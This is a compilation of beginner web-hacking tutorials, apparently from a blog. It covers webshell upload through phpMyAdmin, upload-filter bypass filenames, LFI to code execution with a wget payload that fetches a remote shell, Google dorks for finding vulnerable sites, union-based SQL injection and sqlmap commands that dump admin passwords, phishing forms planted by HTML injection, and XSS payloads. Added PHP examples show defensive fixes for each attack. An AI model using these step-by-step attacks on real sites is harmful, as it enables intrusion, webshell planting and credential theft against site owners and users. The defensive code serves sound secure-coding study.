Shell Uploading Via Phpmyadmin

In this tutorial I will show you shell uploading via phpMyAdmin step by step. For those who already know this trick, I am sorry, but many of my friends don't know it.

phpMyAdmin should be protected with a password, but there are still some websites that don't use a password on phpMyAdmin.

  • First we must know the path of the document root, for example from phpinfo.php.
  • Now we go to phpMyAdmin and create a database.

I have created a database named shell. Just create a database with your desired name.

  • After creating the database, click on it, go to Structure and create a table with 1 column. After clicking Go, enter a name and set the type to TEXT.
  • Then go to Insert, paste your uploader code and click Go.
  • Now go to the table in the database, open the SQL tab and insert this query.

SELECT * FROM shell INTO OUTFILE 'C://wamp//www//shell//shell.php'

  • Yeah, we have uploaded our uploader from phpMyAdmin. Now just go to the desired location and upload your shell. 😉

Shell Uploading Via Tamper Data

In this session we will discuss shell uploading via Tamper Data, or the shell uploading bypass method. During hacking you have logged in to an admin panel that asks you to upload an image with a .jpg or .png extension, but you are not able to upload a shell; then read this tutorial carefully, step by step.

In this tutorial we will bypass the file upload restriction using the jpg extension, so let's start our work.

  • Go to your desired location to upload files and rename your shell with a .php.jpg extension, e.g. shell.php to shell.php.jpg.
  • Now click on Tools > Tamper Data > Start Tamper and click on upload.
  • Now tamper the request, find your file in the POST data, rename shell.php.jpg to shell.php and click OK.
  • Now your shell is successfully uploaded; just access your shell.

Advance Shell uploading bypassing Extensions

1) shell.jpg.php (satisfies a check for jpg only)
2) shell.jpg.PhP (obfuscation)
3) shell.php;.jpg (sometimes what comes after ";" is ignored)
4) shell.php%0delete0.jpg (the infamous NULL byte which comments out trailing text; remove the word delete so the zeros join together, blogspot strips this string!)
5) shell.php.test (defaults to the first recognised extension, ignoring "test")
6) shell.php.xxxjpg (still ends in .jpg, but not a recognised extension so will default to php!)
7) .phtml (a commonly used PHP-parsed extension often forgotten about!)
8) .php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists)
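
From the defending side, every name in the list above, and the Tamper Data rename before it, fails against a server-side check that accepts only a single allow-listed extension, verifies the content type and stores the file under a server-generated name. The following PHP is an added example, not part of the original tutorial; `ALLOWED` and `storage_name_for_upload` are names assumed for illustration.

```php
<?php
declare(strict_types=1);

// Extensions this (hypothetical) image form accepts, mapped to the MIME
// type the file content must really have.
const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png'];

// Returns a server-generated storage name, or null when the upload is rejected.
// $clientName comes from the request and is fully client-controlled, which is
// why editing it in transit (Tamper Data) defeats any browser-side check.
function storage_name_for_upload(string $clientName, string $tmpPath): ?string
{
    // Exactly "name.ext": one dot, no ';', '%', NUL, slash or second extension.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})\z/', $clientName, $m)) {
        return null;
    }
    $ext = strtolower($m[1]);
    if (!array_key_exists($ext, ALLOWED)) {
        return null;                       // php, phtml, php3/4/5, test, ...
    }
    // The bytes must match the type the extension claims.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED[$ext]) {
        return null;
    }
    // Never reuse the client's name on disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs: a PNG signature plus IHDR header, and PHP source.
$png = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($png, "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\0\1\0\0\0\1\x08\x06\0\0\0");
$txt = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($txt, "<?php echo 'not an image';\n");

$cases = [
    ['photo.png', $png], ['photo.png', $txt], ['shell.php', $png],
    ['shell.php.jpg', $png], ['shell.jpg.php', $png], ['shell.jpg.PhP', $png],
    ['shell.php;.jpg', $png], ["shell.php\0.jpg", $png], ['shell.php.test', $png],
    ['shell.php.xxxjpg', $png], ['shell.phtml', $png], ['shell.php5', $png],
];
foreach ($cases as [$name, $path]) {
    $stored = storage_name_for_upload($name, $path);
    printf("%-18s %s\n", addcslashes($name, "\0"), $stored ?? 'REJECTED');
}
unlink($png);
unlink($txt);
```

Storing uploads outside the document root, or in a directory where the web server does not execute PHP, keeps even a wrongly accepted file from running.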

Local File Inclusion (LFI) Vulnerability Attack

In this tutorial we will discuss the local file inclusion vulnerability, how it occurs and how it can be patched. First, let me start with an introduction to file inclusion.

A file inclusion is a vulnerability which allows an attacker to access unauthorised files on a web server and execute malicious code by abusing the 'include' function.

What is Local File Inclusion (LFI) vulnerability?

Local file inclusion (LFI) is the process of including a local file available on the web server. This vulnerability occurs when user input contains the path of the file to be included. When this input is not properly sanitised, an attacker can supply the location of some default files and access these sensitive files.

Finding Local File Inclusion (LFI) vulnerability in a website

Now we are going to find a local file inclusion on a website. We found a website, so let's check whether it is vulnerable or not.

www.vulnerablewebsite.com/view.php?page=contact.php

Now let's replace contact.php with ../ so the URL becomes

www.vulnerablewebsite.com/view.php?page=../

After requesting this page we got an error, so there is a big chance of a Local File Inclusion vulnerability. Let's go to the next step.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

Now let's check for etc/passwd to see if it is vulnerable to Local File Inclusion. Let's make a request.

www.vulnerablewebsite.com/view.php?page=../../../etc/passwd

We got an error and no etc/passwd file.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

So we go more directories up.

www.vulnerablewebsite.com/view.php?page=../../../../../etc/passwd

If you get a page like this, that means you have successfully included the /etc/passwd file.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

Yeah, we successfully included a file, and our next step is to include the proc/self/environ file. So now replace /etc/passwd with /proc/self/environ as shown below.

www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

If you get something like this, that means you have successfully included the proc/self/environ file.

DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.vulnerablewebsite.com
HTTP_REFERER=http://www.vulnerablewebsite.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.vulnerablewebsite.com Port 80

proc/self/environ is accessible. If you got a blank page or an error, proc/self/environ is not accessible or the OS is FreeBSD.
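
The patch for the `view.php?page=` pattern is to stop building a path from the request at all. This added example (not code from the original tutorial; `PAGES`, `PAGE_DIR` and `resolve_page` are hypothetical names) maps the parameter to a fixed list of files and replays the request values from the walkthrough against it.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern behind view.php?page=... (for contrast, never called):
//     include($_GET['page']);
// The request value reaches include() unchanged, so "../" sequences select
// any file the web server user can read, /proc/self/environ included.

// Hardened form: the parameter is only a key into a fixed map of page files.
const PAGE_DIR = __DIR__ . '/pages';
const PAGES = [
    'contact' => 'contact.php',
    'about'   => 'about.php',
];

// Returns the absolute path to include, or null for anything not on the map.
function resolve_page(string $requested): ?string
{
    // Accept both "contact" and the existing "contact.php" link form.
    $key = preg_replace('/\.php\z/', '', $requested);
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return null;
    }
    return PAGE_DIR . '/' . PAGES[$key];
}

// The request values used in the walkthrough, replayed as constructed input.
$requests = [
    'contact.php',
    '../',
    '../../../etc/passwd',
    '../../../../../etc/passwd',
    '../../../../../proc/self/environ',
    "contact.php\0.jpg",
];
foreach ($requests as $value) {
    $path = resolve_page($value);
    printf("%-36s %s\n", addcslashes($value, "\0"), $path ?? '404 (not on allow-list)');
}

// In the real script the result is used like this:
//     $path = resolve_page($_GET['page'] ?? 'contact');
//     if ($path === null) { http_response_code(404); exit; }
//     include $path;
```

Because the request value never becomes part of a path, the content of the User-Agent header is never reachable through include() either.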

Injecting malicious code into a Local File Inclusion vulnerable website

Now let's inject our malicious code into proc/self/environ. How can we do that? We can inject our code in the User-Agent HTTP header. Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL

www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

Now tamper this request, add your uploader script in the User-Agent and then submit. After submitting you will get an uploader or the /proc/self/environ page; just browse and upload your shell.

You can also upload your shell by downloading it remotely using the wget command.

<?system('wget www.shell.com/shell.txt -O shell.php');?>

Add this command in the User-Agent and request the page. Now our command is executed: it downloads the .txt shell from www.shell.com/shell.txt and saves it as shell.php in the website directory through system(), and our shell is created. If it doesn't work, try exec(), because system() can be disabled on the web server from php.ini.

Accessing our shell

Now let's check if our malicious code was successfully injected. Let's check if the shell is present.

www.vulnerablewebsite.com/shell.php

Our shell is there. The injection was successful.

So I think everybody enjoyed this tutorial. Keep practising and learning. 🙂

SQL injection Union Based Manually Step by Step

Hello guys, hope you are doing well. In this tutorial we will discuss basic union-based SQL injection done manually. First I would recommend you learn the basics of SQL from w3schools. So let me start with an introduction.

What is SQL Injection?

SQL injection is a type of code injection vulnerability in the database layer. A successful SQL injection exploit can read and modify the backend database. This vulnerability can be found where user input is incorrectly filtered for strings.

What can an attacker do?

  • An attacker can inject into the website and read and modify the database.
  • An attacker can take control of your admin panel if you have one.
  • If the targeted website is an e-commerce site and stores information, the attacker can easily get it.
  • An attacker can shell and deface the website.

So let's start our work…

Step 1:

Find an SQL injection vulnerable website with Google dorks.

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:shop.php?id=

Step 2:

Now you have to check for the vulnerability by adding a single quote after the id parameter and hitting Enter. If you get an error message like an SQL syntax error, that means the site is vulnerable to SQL attack.

www.vulnerablesite.com/index.php?id=1'

Step 3:

After checking, if the site is vulnerable, you have to find the number of columns using the order by statement.

www.vulnerablesite.com/index.php?id=1' order by 1 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 2 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 3 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 4 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 5 --+ [error]

Here I got the error message at order by 5, which means the total number of columns is 5.

Step 4:

Now we will find the vulnerable column using the union command.

www.vulnerablesite.com/index.php?id=1' union select 1,2,3,4 -- +

As you can see in the above image, the vulnerable column is 2. We will use the following commands in it.

Version - @@version, also version()
Database - database()
Current User - user()

Step 5:

Now we will find the table names. Just paste the query given below in the vulnerable column.

(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())

Step 6:

We will find the column names of a particular table. Just use this query.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name= [table name in hex]

Yeah, now we have the column names of the table, and our next target is to dump the data.

Step 7:

Now we have the database, table name and column names as well, so we will dump the database of the targeted website. Just replace column_name with the target columns, for example admin, user etc., and add from and the targeted table at the end.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(username,0x3a,password),3,4 from admin--+

Yeah, we got the username and password.
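
On the defending side, the quote test, the ORDER BY probing and the UNION SELECT all depend on the id value being concatenated into the query text. This added example (not from the original tutorial; the `articles` table and `find_article` are assumptions, and an in-memory SQLite database stands in for the real one) validates the id as an integer and binds it as a parameter, then replays the id values used above.

```php
<?php
declare(strict_types=1);

// Constructed sample data. Assumption: pdo_sqlite is available; the same
// PDO calls apply to a MySQL connection.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT)');
$pdo->exec("INSERT INTO articles VALUES (1, 'Hello', 'First post', 'ahmed')");

// Vulnerable pattern behind index.php?id= (for contrast, never executed):
//     $pdo->query("SELECT * FROM articles WHERE id='" . $_GET['id'] . "'");
// The quote in id=1' closes the string literal and the rest is parsed as SQL.

// Returns the row as an array, null when the id does not exist, or false
// when the input is not a positive integer (caller should answer HTTP 400).
function find_article(PDO $pdo, string $rawId)
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return false;                  // rejected before any query is built
    }
    // The statement text is fixed; the value travels separately as an integer.
    $stmt = $pdo->prepare('SELECT id, title, body, author FROM articles WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The id values from the steps above, replayed as constructed input.
$ids = ['1', "1'", "1' order by 5 --+", "1' union select 1,2,3,4 -- +", '2'];
foreach ($ids as $raw) {
    $result = find_article($pdo, $raw);
    if ($result === false) {
        $outcome = '400 rejected before any query runs';
    } elseif ($result === null) {
        $outcome = '404 no such article';
    } else {
        $outcome = '200 ' . $result['title'];
    }
    printf("%-32s %s\n", $raw, $outcome);
}
```

Turning off display_errors in production also removes the SQL syntax error message that Step 2 relies on.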

Keep practising, but don't harm any site…

HTML Injection Step by Step For Begineers

Hello guys, hope you are doing well and practising. Today in this post we will discuss HTML injection and why HTML injection is risky.

What is HTML injection?

HTML Injection (Hyper Text Markup Language Injection) is a vulnerability which allows an attacker to inject a malicious script via a specific parameter. HTML Injection is also referred to as virtual defacement of a web application.

The possible attack scenarios are described below.

  1. An attacker can find a vulnerability and perform HTML injection.
  2. An attacker can do phishing from the vulnerable website and send an email to the victim.
  3. The user visits the page because of the trustworthy domain and may enter a user ID and password, which are sent to the attacker's server.

So let's start…

  1. First you need to find a website which is vulnerable to HTML injection. Here I am using the bWAPP lab.
  2. Here I have opened the page which is vulnerable to HTML injection. Just add your HTML code as shown below.
  3. As you can see, I added my simple <h1> ahmed </h1> code and it was executed.
  4. Now let's try some more HTML tags such as bold, colour, background etc.

See the above image: I have modified the page's look using some basic tags. You can also perform an XSS attack using HTML injection, as shown in the image below.

So let's try to create a login form using this code.

<form action="http://127.0.0.1/login.php" method="POST">
Username: <input type="text" name="username"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Login"></form>

Make any page of your own, or add your deface page; change this code and change your location.

<form action="http://127.0.0.1/login.php" method="POST">

Just log in with any username and password and see what happens.

This page is shown after the victim logs in 🙁 and we successfully got the ID and password.

Keep learning and injecting, but don't harm any site.

How to find sql vulnerable website easily

Hello guys, in this post I will show you how you can find lots of SQL vulnerable websites with a single dork using an automated tool, but I recommend you find them manually. Many newbies don't easily get a vulnerable site to inject, so with this tutorial they will be able to find SQL vulnerable websites easily.

In this tutorial we will use SQL DB. If you don't have SQL DB, you can download it from Google.

  • Launch SQL DB; on the left you will see the search option.
  • Just enter your dork. The best feature of this tool is that it lets you choose which search engine you want to use; the others are Deep scan and proxy.
  • When you start the search using your dork, it will start scanning.
  • Once scanning has started, you can see multiple tabs such as proxy, vulnerable etc.
  • Just click on vulnerable and it shows you the list of SQL vulnerable websites.

Cross site scripting (XSS) Vulnerability

Hello guys, welcome to Infosec Zone. Today I am going to show you the cross-site scripting vulnerability, which is one of the most dangerous vulnerabilities and is listed in the OWASP Top 10. Read carefully, try and practise. In this tutorial we will cover reflected cross-site scripting with the GET method and the POST method.

What is cross-site scripting (XSS)?

XSS is a type of attack in which an attacker injects a malicious script into a website. XSS occurs when a web application is used to send code, in the form of a browser-side script, to different end users.

A malicious script can access cookies, session tokens or other sensitive information. It is caused by insufficient input validation on the server side as well as the client side.

There are two basic types of XSS:

  • Reflected cross-site scripting (XSS) attack (non-persistent)
  • Stored cross-site scripting (XSS) attack (persistent)

Read more about them on the official OWASP website.

So let's start the practical…

Here I am using bWAPP on my localhost; you can use this or DVWA, but I think bWAPP is much better than DVWA.

In this practical we use this payload:

<img src=lol.png onerror=prompt(document.domain) />

First select the XSS vulnerability to attack and start.

Just paste this payload in the first name and last name fields and click Go. As a result you can see that our code is executed and we got a popup.

Great, we have successfully XSSed… 🙂

The above XSS used the GET method. Let's start the POST method. For the POST method the requirement is the HackBar add-on in Firefox. Install it if you don't have it and follow me step by step.

Just click on Post data in HackBar, type anything in both fields and load the URL; you will see something like this.

In the post data add the payload (see the image below) and execute.

Yeah, our code is executed… Keep learning 🙂 and share it.
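
Both the HTML injection tutorial and the reflected XSS above work because request data is written into the page unencoded, whether it arrives by GET or POST. This added example (not from the original tutorials; `h`, `greet_unsafe`, `greet_safe` and `hardening_headers` are hypothetical names) shows the vulnerable output beside the encoded one for the inputs used on this page, plus response headers that block inline handlers and off-site form posts.

```php
<?php
declare(strict_types=1);

// Encode a value for an HTML text node or a quoted attribute value.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern (for contrast): request data concatenated into markup,
// so tags in the first name / last name fields become part of the page.
function greet_unsafe(string $first, string $last): string
{
    return '<p>Welcome ' . $first . ' ' . $last . '</p>';
}

// Fixed pattern: every request value is encoded at the point of output.
function greet_safe(string $first, string $last): string
{
    return '<p>Welcome ' . h($first) . ' ' . h($last) . '</p>';
}

// Response headers that limit the damage if an encoding call is ever missed.
// Assumption: the site serves its own scripts and form targets from its origin.
// script-src without 'unsafe-inline' stops onerror= handlers from running;
// form-action 'self' stops an injected form from posting to another host.
function hardening_headers(): array
{
    return [
        "Content-Security-Policy: default-src 'self'; script-src 'self'; form-action 'self'",
        'X-Content-Type-Options: nosniff',
    ];
}

// The inputs used in the two tutorials, as constructed sample data.
$inputs = [
    '<h1> ahmed </h1>',
    '<form action="http://127.0.0.1/login.php" method="POST">',
    '<img src=lol.png onerror=prompt(document.domain) />',
];
foreach ($inputs as $in) {
    echo 'unsafe: ', greet_unsafe($in, 'x'), "\n";
    echo 'safe:   ', greet_safe($in, 'x'), "\n\n";
}
foreach (hardening_headers() as $line) {
    echo $line, "\n";   // in a real response: header($line);
}
```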


SQL injection through SQLMAP step by step

Hello guys, today I am going to show you a major vulnerability in web applications. There are many types of injection, and SQL injection is one of them. SQL injection is a very vast topic; keep learning, even I am still a learner. So without wasting any time let's come to the point.

SQL Injection

SQL injection is a type of vulnerability in which an attacker can execute some code and expose the backend database; in simple words, an attacker can dump your database.

SQL Map

SQLMap is a command-line tool used for exploiting SQL injection vulnerabilities. It is an open source tool.

If you are using Windows you can download SQLMap; Kali, however, has SQLMap built in.

Let's start the practical…

  • Launch SQLMap

Now type the following command in the terminal

  • python sqlmap.py -u http://yourtargetaddress.com/?id=1 --current-db

  • Now SQLMap has started. It will take a couple of seconds to enumerate the database.
  • Now we have the database, as you can see in the above image. Our next step is to enumerate tables.
  • Type the following command to enumerate tables; follow me step by step. 🙂

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name --tables

As you can see in the image below, we have successfully enumerated the table names.

In the above image you can see that sqlmap enumerated the table names. Now we have to find the columns. Here I am finding the columns for admin.

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name -T table name --columns

Again sqlmap is enumerating column names, from the table admin.

Cool guys, we have successfully enumerated the column names. Now our next step is to dump/enumerate the username and password.

Follow me and use this command

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name -T table name -C column name --dump

sqlmap started enumerating the database; as you can see, the database is enumerated.

Yeah, we got the username and password. 🙂 Keep learning and practising, but don't harm any site…